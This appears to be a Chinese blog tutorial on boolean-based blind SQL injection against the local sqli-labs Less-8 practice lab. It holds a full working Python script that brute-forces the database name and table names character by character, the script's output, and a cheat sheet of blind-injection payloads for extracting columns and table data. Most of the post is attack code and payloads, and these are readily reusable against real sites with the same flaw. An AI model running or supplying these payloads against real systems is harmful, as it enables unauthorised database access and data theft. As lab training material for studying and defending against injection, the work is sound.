sql盲注的python脚本复现

最新推荐文章于 2024-07-25 21:03:55 发布
最新推荐文章于 2024-07-25 21:03:55 发布
阅读量148 收藏 1
点赞数
文章标签: sql python 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Azehng/article/details/133862308
版权

sql注入盲注操作

最近在研究sql注入的时候,对盲注的玩法比较感兴趣,自己写了一些关于盲注的python脚本,此环境针对的是sqlilabs的第八关,其他场景也可以做类似改造。

1.爆数据库长度

payload:' and length(database())={}--+     //{}是爆破位置

2.爆破每一位数据库字符

payload:' and substr(database(),{},1)={}    //第一个{}对应数据库名的索引,第二个{}对应索引值

3.爆破对应数据库的表个数

payload:' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+   //第一个{}对应指定数据库名,第二个{}对应表个数

4.爆破对应数据库的表的长度

payload:' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+   //填充位分别是数据库名,表的序号,表的长度

5.爆破对应数据库的表的名字

payload:' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+

6.代码展示

拖库也是用相似的payload,下面给出一下源代码,我的环境搭建在本地,url为"http://sqlilabs/Less-8/?id=1"。

#### 盲注获取数据
import requests
import time

header = {
    "Host": "sqlilabs",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.60",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Connection": "close"
}
chars = "abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWZYZ0123456789~!@#$%^&*()_+<>?"
url = "http://sqlilabs/Less-8/?id=1"
length_payload = "' and length(database())={}--+"


def get_length(url, length_payload):
    for x in range(1, 50):
        ex_url = url + length_payload.format(x)
        print(ex_url)
        response = requests.get(ex_url, headers=header)
        if "You are in" in response.text:
            # print(response.text)
            print("长度是" + str(x))
            return x


length = get_length(url, length_payload)

data_payload = "' and (substr(database(),{},1))='{}'--+"


def get_data(url, data_payload, length):
    data = ""
    start_time = time.time()
    for x in range(1, length + 1):
        for char in chars:
            ex_url = url + data_payload.format(x, char)
            response = requests.get(ex_url, headers=header)
            if "You are in" in response.text:
                data += char
                print("数据是" + data)
                break
    end_time = time.time()
    print("用时为:{}".format(end_time - start_time))
    # print(response.text)
    return data


name = get_data(url, data_payload, length)
print("数据库名为:" + name)

table_count_payload = "' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+"


def get_table(url, table_payload, db_name):
    for x in range(1, 50):
        ex_url = url + table_payload.format(db_name, x)
        print(ex_url)
        response = requests.get(ex_url, headers=header)
        if "You are in" in response.text:
            # print(response.text)
            print("表的个数是" + str(x))
            return x


table_count = get_table(url, table_count_payload, name)

table_length_payload = "' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+"
table_name_payload = "' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+"


def get_table_name(url, table_length_payload=table_length_payload, table_name_payload=table_name_payload,
                   table_count=table_count, db__name=name):
    table_list=[];
    start_time = time.time()
    for i in range(1, table_count + 1):
        data = ""
        # 判断表的长度
        for len in range(1, 50):
            ex_url = url + table_length_payload.format(db__name, i - 1, len)
            response = requests.get(ex_url, headers=header)
            # print(ex_url)
            if "You are in" in response.text:
                # print(response.text)
                # print("第{}表的长度是{}".format(i, len))
                # 找表名
                for j in range(1, len + 1):
                    for char in chars:
                        ex_url2 = url + table_name_payload.format(db__name, i - 1, j, char)
                        # print(ex_url2)
                        response = requests.get(ex_url2, headers=header)
                        if "You are in" in response.text:
                            data += char
                            # print("数据是" + data)
                            break
                table_list.append(data)
                break
    end_time = time.time()
    # print("第{}个表名为{}".format(i, data))
    print("用时为:{}".format(end_time - start_time))
    return table_list


print(get_table_name(url))

7.结果展示

运行一下,看下结果。

长度是8
数据是s
数据是se
数据是sec
数据是secu
数据是secur
数据是securi
数据是securit
数据是security
用时为:1.7992594242095947
数据库名为:security
表的个数是4
用时为:6.969999313354492
['emails', 'referers', 'uagents', 'users']

我这里把payload输出注释了,有的小伙伴想看payload也可以自行打印。

8.常见盲注payload

我把常见的sql盲注payload总结一下:

爆数据库长度:' and length((select schema_name from information_schema.schemata limit 0,1))={}--+
爆数据库名:' and substring((select schema_name from information_schema.schemata limit 0,1),{},1)={}--+
爆指定数据库下表的个数:' and (select count(table_name) from information_schema.tables where table_schema='{}')={}--+ 
爆指定数据库下表的长度:' and (select length(table_name) from information_schema.tables where table_schema='{}' limit {},1)={}--+
爆指定数据库下表的名字:' and substr((SELECT table_name from information_schema.tables WHERE table_schema='{}' LIMIT {},1),{},1)='{}'--+
爆表的字段数目:' and (select count(column_name) from information_schema.columns where table_schema={} and tabe_name='{}')={}--+
爆表的字段长度:' and (select length(column_name) from information_schema.columns where table_schema= '{}' and table_name= '{}' limit {},1)={}--+
爆表的字段名:' and substr((select column_name from information_schema.columns where table_schema= '{}' and table_name= '{}' limit {},1),{},1)='{}'--+
爆指定表数据个数:' and (select count(*) from {})={}--+
爆指定表下的指定字段长度:' and length(substr((select {} from {} limit 0,1),1))={}--+
爆指定表下的指定字段数据:' and substr((select {} from {} limit 0,1),1,1)={}--+
Azehng
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入自动化python脚本
CMACCKK
08-10 3537
写了一个python3注入sql脚本 临近毕业,尝试写一些自动注入和自动扫描的脚本 发现还是不够自动 后面我再改改。现在脖子疼 实现效果 代码如下: import requests from bs4 import BeautifulSoup from colorama import init, Fore, Back, Style import sys import time import urllib.parse import re from prettytable import PrettyTab
python脚本调用http接口_简单的python http接口自动化脚本
weixin_39860849的博客
12-21 2509
今天给大家分享一个简单的python脚本,使用python进行http的接口测试,脚本很简单,逻辑是:读取excel写好的测试用例,然后根据excel中的用例内容进行调用,判断预期结果中的返回值是否和返回报文中的值一致,如果不一致则根据用例标题把bug提交到bug管理系统,这里使用的bug管理系统是bugfree。实现步骤:1、读取excel,保存测试用例中的内容;2、根据excel中的请求url...
python脚本实现sql时间盲注
wrypot的博客
03-27 760
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
Python脚本--SQL盲注
m0_62202418的博客
11-26 428
【代码】Python脚本--SQL盲注
sqli-labs 第九关 基于时间盲注 python 脚本
Mirror_iu的博客
01-25 3058
# @Author:Mirror import time import requests db_len = 0 def get_schema_len (url): len = 0 left = 0 right = 20 while (left <= right): mid = left + (right - left)//2; data = "id=1' and if(length(database())>{},sleep(0.
SQL盲注python脚本自动化注入
菜鸟学安全的博客
12-18 1387
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
Python自动化sql注入:布尔盲注_布尔盲注脚本,一次关于网络安全的面试经历
2401_84182636的博客
04-10 1043
id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘表名’ limit 1,1),1,1))=102–+是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!id=1’ and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1–+
sqli中盲注使用python脚本快速爆破_boolian based,毕业一年萌新的网络安全大厂面经
2401_83974783的博客
04-18 350
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
记一次sql盲注脚本编写(复现sql注入)
whojoe的博客
04-13 2899
记一次sql盲注脚本编写前言开始测试已经修改了网站的具体信息这里只是做一个演示使用burp测试使用sqlmap命令复现漏洞php文件数据表bool注入脚本结果结束 前言 同学发给我一个钓鱼网站,打开经过简单的测试发现没什么漏洞,但是还不想放手,所以就尝试了一下referer还有数据包中不存在的xff头 开始测试 已经修改了网站的具体信息这里只是做一个演示 POST /sql.php HTTP/1....
轻松短租网sql脚本
11-10
【标题】"轻松短租网sql脚本"指的是与轻松短租网相关的SQL数据库脚本,这类脚本通常用于...通过执行这个SQL脚本,我们可以复现一个与轻松短租网类似的数据库环境,这对于学习、测试或扩展这个平台的功能都十分有益。
Python基于Django框架的投票管理系统源代码+数据库初始化脚本
05-08
Django的核心特性包括其内置的ORM(对象关系映射),它允许开发者用Python代码操作数据库,而无需直接编写SQL。此外,Django还提供了强大的URL路由系统、模板引擎和表单处理功能,使得创建动态网页变得简单。在这个...
数据库课程设计期末大作业,利用sql sever2018 进行建库,利用python处理后端程序,flask搭建前端.zip
06-29
同时,还提供了完整的数据库脚本、代码示例以及详细的文档说明,让您能够轻松理解和复现每一个设计。 通过学习和借鉴这些课程设计,您将能够掌握数据库设计的核心方法和技巧,提升自己解决实际问题的能力,为今后的...
山东大学,数据库课程设计实验,图书管理系统(SQL数据库+Python可视化界面).zip
06-29
同时,还提供了完整的数据库脚本、代码示例以及详细的文档说明,让您能够轻松理解和复现每一个设计。 通过学习和借鉴这些课程设计,您将能够掌握数据库设计的核心方法和技巧,提升自己解决实际问题的能力,为今后的...
Python库 | datasource-0.1.0.zip
03-13
`setup.py`是一个Python脚本,用于构建、打包和安装Python项目。而`requirements.txt`则记录了项目所依赖的外部库及其版本,方便其他人复现开发环境。 在`datasource-0.1.0`目录下,可能会有以下结构: 1. `__init...
会Excel就会sql
svygh123的专栏
07-20 1463
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
求教Postgresql在jdbc处理bit(1)字段的预处理解决方案
weixin_44231698的博客
07-25 400
postgresql 在jdbc处理bit(1)字段
SQL 基础知识
最新发布
qq_62752002的博客
07-25 829
用于定义和管理数据库结构的命令。创建数据库创建表...删除数据库删除表修改表。
mysql 数据库空间统计sql
小 tom的博客
07-24 711
information_schema用于存储数据库元数据,本文sql 主要是 MySQL系统库之information_schema的实现,查询数据库结构:information_schema 可用于查询数据库、表、列、索引、外键、触发器等对象的结构信息。权限管理:可以使用 information_schema 查询用户和权限信息,以确保正确的访问控制和权限设置。性能优化:information_schema 提供有关索引、表大小、表引擎等性能相关信息,这对于性能优化很有帮助。
sql注入盲注python脚本
04-06
下面是一个使用Python编写的简单SQL注入盲注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值